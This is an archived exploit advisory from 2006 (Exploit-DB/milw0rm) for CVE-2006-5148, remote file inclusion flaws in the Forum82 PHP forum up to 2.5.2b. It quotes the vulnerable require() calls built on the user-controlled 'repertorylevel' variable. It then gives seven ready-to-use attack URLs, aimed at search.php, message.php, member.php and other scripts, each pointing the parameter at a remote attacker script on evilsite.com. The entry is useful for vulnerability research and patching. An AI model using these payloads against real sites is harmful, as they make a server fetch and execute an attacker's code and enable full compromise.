Forum82 < 2.5.2b - 'repertorylevel' Multiple File Inclusions

Author: Silahsiz Kuvvetler
type: webapps
platform: php
port: 
date_added: 2006-09-28 
date_updated: 2016-09-12 
verified: 1 
codes: OSVDB-29419;CVE-2006-5148;OSVDB-29418;OSVDB-29417;OSVDB-29416;OSVDB-29415;OSVDB-29414;OSVDB-29413 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comf82_2.5.2.tar.bz2

#==============================================================================================
#Forum82 <= v2.5.2b (repertorylevel) Multiple R.F.I. Vulnerabilities
#===============================================================================================
#
#Critical Level : Dangerous
#
#Script Dowload : http://www.comscripts.com/jump.php?action=script&id=805
#
#Version : v2.5.2b
#
#================================================================================================
#
#Bug in :
#
#almost all files are infected...
#================================================================================================
#
#Vulnerable Code :
#
#		summary & example:
#
#	require($repertorylevel.'include/tables.inc.'.$e);
#       require($repertorylevel.'lang/lang.inc.'.$e);
#       require($repertorylevel.'include/db/mysql.inc.'.$e);
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/search.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/message.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/member.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/mail.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/lostpassword.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/gesfil.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/forum82lib.php3?repertorylevel=http://evilsite.com/evilscript.txt?
#
#bla...bla...
#
#
#
#
#	the script files's are installed as .php3 to website.take care that...
#
#================================================================================================
#Discoverd By : Silahsiz Kuvvetler
#
#
#Conatact : co-type[at]hotmail[dot]com
#
#GreetZ : FaTTaLGazI - NarcoTic - 0xyGen
#
#
#==================================================================================================

# milw0rm.com [2006-09-29]